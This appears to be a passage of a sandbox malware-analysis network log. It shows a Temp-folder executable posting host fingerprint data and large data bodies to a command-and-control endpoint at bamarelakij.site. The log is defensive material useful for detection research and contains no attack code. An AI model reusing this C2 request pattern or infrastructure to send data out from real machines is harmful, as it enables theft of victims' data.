                                                                                                                                                                  15 | 192.168.2.4 | 50061 | 104.21.80.52 | 443 | 8148 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                  2025-01-06 22:18:11 UTC | 352 | OUT | POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
                                                                                                                                                                  Content-Length: 147
                                                                                                                                                                  Host: bamarelakij.site
                                                                                                                                                                  2025-01-06 22:18:11 UTC | 147 | OUT | Data Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 00 60 00 00 00 00 00 00 00 00 00 00 00 fe ff ff ff 97 00 a0 d9 26 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a a0 ce 64 f0 ae ad cf 01 d9 f5 d7 9d 1e 13 ec d9 24 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                  Data Ascii: `&Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzd$9e146be9-c76a-4720-bcdb-53011b87bd06
                                                                                                                                                                  2025-01-06 22:18:11 UTC | 846 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Mon, 06 Jan 2025 22:18:11 GMT
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: close
                                                                                                                                                                  v: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/
                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B%2BXjtQVVVTOylAI9c1JSsKN%2Brsh6XF4Y7MJVxm%2FeXmt3EAhp2CTEDOq%2F0tBrgbRD09WTcks3Ysg5Bk821UsC3sSjdaCGWTmP0iRWWS1XdW0WeGm38gFRyrxA1rr6p3eGkLPS"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 8fdf151c4d8b6a5e-EWR
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1602&min_rtt=1593&rtt_var=615&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1135&delivery_rate=1752701&cwnd=187&unsent_bytes=0&cid=4704f84e5ef89d1c&ts=1021&x=0"
                                                                                                                                                                  2025-01-06 22:18:11 UTC | 17 | IN | Data Raw: 63 0d 0a f2 82 00 00 00 00 00 00 00 00 00 00 0d 0a
                                                                                                                                                                  Data Ascii: c
                                                                                                                                                                  2025-01-06 22:18:11 UTC1369INData Raw: 33 32 65 36 0d 0a e0 c7 0b 36 0e 00 7f 0e 86 0b 13 00 ec 0e 16 11 02 ec 08 7a 59 86 0b 65 9b b6 a7 b7 51 c9 59 b3 b2 b1 b5 b7 af 31 39 b7 bb b9 b2 39 b9 20 00 96 09 05 0f 13 00 ec 0e 16 11 02 ec 08 3e 59 05 0f 65 9b b6 a7 b7 51 c9 59 a9 a7 23 2a ab a0 29 a2 2e ab a7 ab 1b 1a 99 19 27 b7 32 b2 2e 2b b0 36 3b b2 2e a9 3a b2 b0 b6 04 00 ac 09 ce 02 0f 00 e4 0e 16 11 02 e4 04 34 59 ce 02 bc 58 d8 c3 49 7d 17 f0 0b 00 42 01 a9 05 13 00 ec 0e 16 11 02 ec 08 34 59 a9 05 65 9b b6 a7 b7 51 c9 59 28 39 b2 33 b2 39 b2 37 b1 b2 b9 04 00 c6 03 32 0c 0f 00 e4 0e 16 11 02 e4 04 72 59 32 0c 65 fc e2 b9 9f d9 2d 8a 04 00 24 09 7a 0d 0f 00 e4 0e 16 11 02 e4 04 76 59 7a 0d f9 87 f9 1f 08 a2 36 2c 20 00 da 0c 94 00 13 00 ec 0e 16 11 02 ec 08 76 59 94 00 65 9b b6 a7 b7 51 c9
                                                                                                                                                                  Data Ascii: 32e66zYeQY199 >YeQY#*).'2.+6;.:4YXI}B4YeQY(93972rY2e-$zvYz6, vYeQ
                                                                                                                                                                  2025-01-06 22:18:11 UTC1369INData Raw: a4 37 32 b2 3c b2 32 22 21 2e b1 34 39 b7 b6 b2 96 b2 3c 3a b2 37 b9 b4 b7 37 af b3 b7 35 34 b1 32 b3 b1 38 31 38 33 b4 b3 b1 b0 b2 35 38 33 34 33 b2 b3 b2 b5 32 b3 b4 31 36 b5 af 18 17 b4 37 32 b2 3c b2 32 32 31 17 36 b2 3b b2 36 32 31 01 00 ee 0c 76 0a 13 00 ec 0e 16 11 02 ec 08 ed 59 76 0a 65 9b b6 a7 b7 51 c9 59 05 08 00 3a 06 a4 0e 13 00 ec 0e 16 11 02 ec 08 73 59 a4 0e 65 9b b6 a7 b7 51 c9 59 b9 b2 3a 3a b4 37 b3 b9 0d 00 e8 0c c1 02 13 00 ec 0e 16 11 02 ec 08 76 59 c1 02 65 9b b6 a7 b7 51 c9 59 26 b7 b1 b0 36 10 a9 3a b7 39 b0 b3 b2 08 00 8a 03 eb 0b 13 00 ec 0e 16 11 02 ec 08 72 59 eb 0b 65 9b b6 a7 b7 51 c9 59 3a 3c 34 b4 37 3a b9 15 04 00 c7 0d 8c 0e 0f 00 e4 0e 16 11 02 e4 04 34 59 8c 0e 9e 1e b5 b8 6b 3b 7a 8b 04 00 cb 0a e2 03 0f 00 e4 0e 16
                                                                                                                                                                  Data Ascii: 72<2"!.49<:7754281835834321672<2216;621vYveQY:sYeQY::7vYeQY&6:9rYeQY:<47:4Yk;z
                                                                                                                                                                  2025-01-06 22:18:11 UTC1369INData Raw: 02 ec 08 76 59 fc 04 65 9b b6 a7 b7 51 c9 59 38 39 b7 33 b4 36 b2 b9 21 00 7f 04 05 0e 13 00 ec 0e 16 11 02 ec 08 34 59 05 0e 65 9b b6 a7 b7 51 c9 59 a7 ba 3a 36 b7 b7 b5 19 18 98 1b 2e a0 38 38 22 b0 3a b0 2e 26 b7 b1 b0 36 2e a7 ba 3a 36 b7 b7 b5 08 00 dc 03 6b 04 13 00 eb 0e 16 11 02 eb 08 9a 59 6b 04 fa 7c d0 f1 1d 72 d0 75 0b e2 4f 96 21 41 96 86 04 00 93 0c f6 0a 0f 00 e4 0e 16 11 02 e4 04 72 59 f6 0a 7b 34 35 38 8b 11 fa 0b 08 00 e1 06 36 03 13 00 eb 0e 16 11 02 eb 08 76 59 36 03 48 be bd a0 fa 4e 2a 71 b8 20 22 c7 c6 7d 6c 82 04 00 77 0e a6 0c 0f 00 e4 0e 16 11 02 e4 04 72 59 a6 0c de 2d 81 4c 2f 08 4e 7f 19 00 c1 01 65 06 13 00 ec 0e 16 11 02 ec 08 73 59 65 06 65 9b b6 a7 b7 51 c9 59 b6 b2 b9 b9 b2 37 b3 b2 39 b9 2e 22 b4 b9 b1 b7 39 32 2e a1 b0
                                                                                                                                                                  Data Ascii: vYeQY8936!4YeQY:6.88":.&6.:6kYk|ruO!ArY{4586vY6HN*q "}lwrY-L/NesYeeQY79."92.
                                                                                                                                                                  2025-01-06 22:18:11 UTC1369INData Raw: 0f 00 e4 0e 16 11 02 e4 04 34 59 4c 09 70 89 a2 0d 81 ac 6d 3e 09 00 cc 05 88 07 13 00 ec 0e 16 11 02 ec 08 34 59 88 07 65 9b b6 a7 b7 51 c9 59 a4 37 32 b2 3c b2 32 22 21 0a 00 37 04 08 0e 13 00 ec 0e 16 11 02 ec 08 76 59 08 0e 65 9b b6 a7 b7 51 c9 59 b6 b9 b2 32 b3 b2 17 b2 3c b2 0b 00 ef 03 72 0f 13 00 ec 0e 16 11 02 ec 08 3e 59 72 0f 65 9b b6 a7 b7 51 c9 59 15 b9 3a b2 b0 b6 15 17 b2 3c b2 11 00 fd 0b 46 03 13 00 ec 0e 16 11 02 ec 08 9a 59 46 03 65 9b b6 a7 b7 51 c9 59 a9 a7 23 2a ab a0 29 a2 2e 2a b4 b3 b2 39 2b 27 a1 11 00 9a 05 08 07 13 00 ec 0e 16 11 02 ec 08 76 59 08 07 65 9b b6 a7 b7 51 c9 59 b1 34 39 b7 b6 b4 ba b6 af 31 39 b7 bb b9 b2 39 b9 08 00 74 0f fb 05 13 00 eb 0e 16 11 02 eb 08 34 59 fb 05 00 ab 5b 92 bc 4e 15 2c f5 35 c4 f5 80 7d 53 df
                                                                                                                                                                  Data Ascii: 4YLpm>4YeQY72<2"!7vYeQY2<r>YreQY:<FYFeQY#*).*9+'vYeQY49199t4Y[N,5}S
                                                                                                                                                                  2025-01-06 22:18:11 UTC1369INData Raw: 02 ec 08 ed 59 98 04 65 9b b6 a7 b7 51 c9 59 15 17 39 32 38 04 00 f5 0e e9 0a 0f 00 e4 0e 16 11 02 e4 04 76 59 e9 0a 2c 36 e8 17 dc f2 d2 21 0b 00 96 04 66 0e 13 00 ec 0e 16 11 02 ec 08 ed 59 66 0e 65 9b b6 a7 b7 51 c9 59 a0 37 bc 22 b2 b9 b5 17 b2 3c b2 08 00 1b 0f 85 0c 13 00 eb 0e 16 11 02 eb 08 d8 59 85 0c 42 e9 cd 96 64 55 b8 e2 b3 77 52 f1 58 66 fe 11 06 00 23 01 93 0f 13 00 ec 0e 16 11 02 ec 08 72 59 93 0f 65 9b b6 a7 b7 51 c9 59 a0 39 b6 b7 39 bc 04 00 fa 05 f8 04 0f 00 e4 0e 16 11 02 e4 04 61 59 f8 04 84 f8 45 7e 75 dd 8a 4d 08 00 68 0c ae 06 13 00 ec 0e 16 11 02 ec 08 5b 59 ae 06 65 9b b6 a7 b7 51 c9 59 28 b0 b9 b9 bb b7 39 32 04 00 31 0c 76 0f 0f 00 e4 0e 16 11 02 e4 04 34 59 76 0f 71 a1 31 f5 80 84 fe c6 07 00 b1 04 2e 08 13 00 ec 0e 16 11 02
                                                                                                                                                                  Data Ascii: YeQY928vY,6!fYfeQY7"<YBdUwRXf#rYeQY99aYE~uMh[YeQY(921v4Yvq1.
                                                                                                                                                                  2025-01-06 22:18:11 UTC1369INData Raw: 11 02 ec 08 34 59 33 0c 65 9b b6 a7 b7 51 c9 59 15 17 b9 b8 36 b4 3a b2 04 00 51 0a e1 09 0f 00 e4 0e 16 11 02 e4 04 73 59 e1 09 df f9 2c 2e 2f d8 e3 1d 04 00 71 0e b1 02 0f 00 e4 0e 16 11 02 e4 04 72 59 b1 02 45 2f 34 7f b7 0a fb 4c 06 00 91 0e f5 0b 13 00 ec 0e 16 11 02 ec 08 9a 59 f5 0b 65 9b b6 a7 b7 51 c9 59 2b b4 b2 bb b2 39 08 00 d8 0c 5a 0f 13 00 eb 0e 16 11 02 eb 08 9a 59 5a 0f c4 f8 d0 16 6d 6a 27 5c 35 66 4f 71 51 59 61 af 04 00 a2 0c 14 09 0f 00 e4 0e 16 11 02 e4 04 72 59 14 09 06 73 70 1d f6 b7 4a 2b 05 00 62 0f 01 01 13 00 ec 0e 16 11 02 ec 08 76 59 01 01 65 9b b6 a7 b7 51 c9 59 15 17 36 32 31 25 00 40 0e b7 04 13 00 ec 0e 16 11 02 ec 08 76 59 b7 04 65 9b b6 a7 b7 51 c9 59 a6 b4 b1 39 b7 b9 b7 33 3a 2e a2 32 b3 b2 2e a0 38 38 36 b4 b1 b0 3a
                                                                                                                                                                  Data Ascii: 4Y3eQY6:QsY,./qrYE/4LYeQY+9ZYZmj'\5fOqQYarYspJ+bvYeQY621%@vYeQY93:.2.886:
                                                                                                                                                                  2025-01-06 22:18:11 UTC1369INData Raw: 02 ec 08 34 59 d1 05 65 9b b6 a7 b7 51 c9 59 24 b4 b9 3a b7 39 bc 04 00 d2 0b 8a 0a 0f 00 e4 0e 16 11 02 e4 04 72 59 8a 0a 34 5e 90 bc c4 7b 5f 8f 08 00 a7 05 04 0f 13 00 eb 0e 16 11 02 eb 08 76 59 04 0f 95 12 0b 84 ba 02 75 3e b8 89 94 e3 86 31 33 cd 04 00 f5 03 34 05 0f 00 e4 0e 16 11 02 e4 04 72 59 34 05 69 42 1a 51 99 67 d5 62 08 00 25 07 5d 0e 13 00 eb 0e 16 11 02 eb 08 34 59 5d 0e 6a 12 61 4e 88 ae 7f b6 9b 8c fe 29 b4 9d 39 45 08 00 1e 03 e9 09 13 00 eb 0e 16 11 02 eb 08 9a 59 e9 09 dd d5 39 9b bd 27 28 fd 2c 4b a6 fc 81 14 6e 0e 04 00 10 07 74 0b 0f 00 e4 0e 16 11 02 e4 04 72 59 74 0b e6 76 8b fb 16 53 44 c8 04 00 c8 01 9f 01 0f 00 e4 0e 16 11 02 e4 04 72 59 9f 01 c7 17 73 5c 36 32 bc 6f 08 00 11 04 ce 00 13 00 eb 0e 16 11 02 eb 08 34 59 ce 00 be
                                                                                                                                                                  Data Ascii: 4YeQY$:9rY4^{_vYu>134rY4iBQgb%]4Y]jaN)9EY9'(,KntrYtvSDrYs\62o4Y
                                                                                                                                                                  2025-01-06 22:18:11 UTC1369INData Raw: 00 ec 0e 16 11 02 ec 08 34 59 04 03 65 9b b6 a7 b7 51 c9 59 a6 b4 b1 39 b7 b9 b7 33 3a 2e a7 ba 3a 36 b7 b7 b5 04 00 be 0b e8 09 0f 00 e4 0e 16 11 02 e4 04 76 59 e8 09 f8 a5 d3 7c 08 61 e9 4a 1d 00 66 09 02 08 13 00 ec 0e 16 11 02 ec 08 73 59 02 08 65 9b b6 a7 b7 51 c9 59 b6 b2 b9 b9 b2 37 b3 b2 39 b9 2e 22 b4 b9 b1 b7 39 32 2e a9 3a b0 31 36 b2 2e b5 b2 bc 04 00 47 06 a0 0f 0f 00 e4 0e 16 11 02 e4 04 34 59 a0 0f a5 f3 2d 12 54 d6 e2 21 04 00 ed 03 21 0f 0f 00 e4 0e 16 11 02 e4 04 72 59 21 0f f2 f7 51 80 02 d6 9e b3 24 00 51 0b 4f 0a 13 00 ec 0e 16 11 02 ec 08 76 59 4f 0a 65 9b b6 a7 b7 51 c9 59 a3 b7 b7 b3 36 b2 2e a1 34 39 b7 b6 b2 2e a0 38 38 36 b4 b1 b0 3a b4 b7 37 2e b1 34 39 b7 b6 b2 17 b2 3c b2 05 00 dd 0a f6 07 13 00 ec 0e 16 11 02 ec 08 34 59 f6
                                                                                                                                                                  Data Ascii: 4YeQY93:.:6vY|aJfsYeQY79."92.:16.G4Y-T!!rY!Q$QOvYOeQY6.49.886:7.49<4Y


                                                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                  16 | 192.168.2.4 | 50073 | 104.21.80.52 | 443 | 8148 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                  2025-01-06 22:18:12 UTC | 453 | OUT | POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
                                                                                                                                                                  fileid: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/
                                                                                                                                                                  Content-Length: 53
                                                                                                                                                                  Host: bamarelakij.site
                                                                                                                                                                  2025-01-06 22:18:12 UTC | 53 | OUT | Data Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 03 02 00 00 00 00 00 00 00 00 00 00 00 fe ff ff ff 91 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                  Data Ascii:
                                                                                                                                                                  2025-01-06 22:18:13 UTC | 744 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Mon, 06 Jan 2025 22:18:13 GMT
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: close
                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Fno4derXhc4zCRBpAQauFsdm0k2IpBCA8fP%2Bvq8TCWlUt7MjsCJ8Y7BSxhh5cpq247gtMOWZaTQ4Fnv4N5ecSrPA0nm73smkVFYt8nEITHTd3jYo5DhRf8OrDEfjWDGbrEPf"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 8fdf1526ecfa4370-EWR
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1617&min_rtt=1611&rtt_var=616&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1142&delivery_rate=1760096&cwnd=231&unsent_bytes=0&cid=a2e710f028e4f247&ts=322&x=0"
                                                                                                                                                                  2025-01-06 22:18:13 UTC29INData Raw: 31 37 0d 0a 07 00 00 00 00 00 00 00 00 00 00 00 fe ff ff ff 91 91 ce 2c 3d 05 b5 0d 0a
                                                                                                                                                                  Data Ascii: 17,=
2025-01-06 22:18:13 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.4 | 50111 | 104.21.80.52 | 443 | 8032 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-06 22:18:21 UTC | 457 | OUT | POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
                                                                                                                                                                  fileid: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/
                                                                                                                                                                  Content-Length: 106564
                                                                                                                                                                  Host: bamarelakij.site
2025-01-06 22:18:22 UTC | 834 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                  Date: Mon, 06 Jan 2025 22:18:22 GMT
                                                                                                                                                                  Connection: close
                                                                                                                                                                  v: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/
                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8zJdEbo0hqXELkQ4qN9ZEvlbl%2FPPgrvLbe2O1%2FLF9C3txBax89SbFZHeswu3wjfZA1JxkgpiwMWucAXrlcCtitWOpDCIAs%2ByVPQE5lJhG%2F8aTGXgjqm%2Fn%2FRtU3mtMYiplyop"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 8fdf155f6ffc41e7-EWR
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1793&min_rtt=1778&rtt_var=678&sent=41&recv=114&lost=0&retrans=0&sent_bytes=2838&recv_bytes=107943&delivery_rate=1642294&cwnd=202&unsent_bytes=0&cid=4c2d7ac663b765a5&ts=793&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 50112 | 104.21.80.52 | 443 | 8032 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-06 22:18:23 UTC | 454 | OUT | POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
                                                                                                                                                                  fileid: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/
                                                                                                                                                                  Content-Length: 745
                                                                                                                                                                  Host: bamarelakij.site
2025-01-06 22:18:23 UTC | 821 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                  Date: Mon, 06 Jan 2025 22:18:23 GMT
                                                                                                                                                                  Connection: close
                                                                                                                                                                  v: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/
                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MUDBBEDwXhkU1l0m5EJtf7Q92GkVXZKFg9zskjA857b4eyGesl6%2B5osLG5yv0OpgYYb0W%2BRv1weH66qEaXuKr38OQp7bQJkSNpZs5vb2JjBuuscbi1tP8jiULC8kxQ3xcMJB"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 8fdf15688a767d11-EWR
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2947&min_rtt=1830&rtt_var=1484&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1835&delivery_rate=1595628&cwnd=32&unsent_bytes=0&cid=7429a742dd5dfa8f&ts=320&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 50113 | 104.21.80.52 | 443 | 8032 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-06 22:18:24 UTC | 454 | OUT | POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
                                                                                                                                                                  fileid: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/
                                                                                                                                                                  Content-Length: 212
                                                                                                                                                                  Host: bamarelakij.site
2025-01-06 22:18:24 UTC | 825 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                  Date: Mon, 06 Jan 2025 22:18:24 GMT
                                                                                                                                                                  Connection: close
                                                                                                                                                                  v: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/
                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MAInfGi%2Fx1WP4UN2GawSdQlz5oYi8HspFXBA82h2LsuCsbLXwti0K35o%2FB8dUOqiSb%2F8RfNkFBq0IJrSdtbN4sCAQ9yYFz4peyB%2Fceo1Z94vX4gY70PgiaKJaILnCSEgoq3L"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 8fdf156f9a0643b9-EWR
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1686&min_rtt=1654&rtt_var=685&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1302&delivery_rate=1526398&cwnd=192&unsent_bytes=0&cid=c5002db0e7fb7aeb&ts=339&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 50114 | 104.21.80.52 | 443 | 8032 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-06 22:18:25 UTC | 454 | OUT | POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
                                                                                                                                                                  fileid: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/
                                                                                                                                                                  Content-Length: 380
                                                                                                                                                                  Host: bamarelakij.site
2025-01-06 22:18:25 UTC | 821 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                  Date: Mon, 06 Jan 2025 22:18:25 GMT
                                                                                                                                                                  Connection: close
                                                                                                                                                                  v: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/
                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Lz5GvdKiHP81qBYMyTlFS6nBZFtJ1CfYZRANwaKwSWQAzutbQ66Tr0t9lyvewLbVQYGoWwBlqXWsuFdCIUL1jovUCy64b6oH5XNDpow17adgPLU8ALqi%2FxiO3aS88W%2FdwjUC"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 8fdf1575b9964378-EWR
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1656&min_rtt=1650&rtt_var=632&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1470&delivery_rate=1713615&cwnd=235&unsent_bytes=0&cid=42f60e8a982eed72&ts=336&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.4 | 50115 | 104.21.80.52 | 443 | 8032 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-06 22:18:27 UTC | 456 | OUT | POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
                                                                                                                                                                  fileid: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/
                                                                                                                                                                  Content-Length: 58769
                                                                                                                                                                  Host: bamarelakij.site
2025-01-06 22:18:28 UTC | 824 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                  Date: Mon, 06 Jan 2025 22:18:28 GMT
                                                                                                                                                                  Connection: close
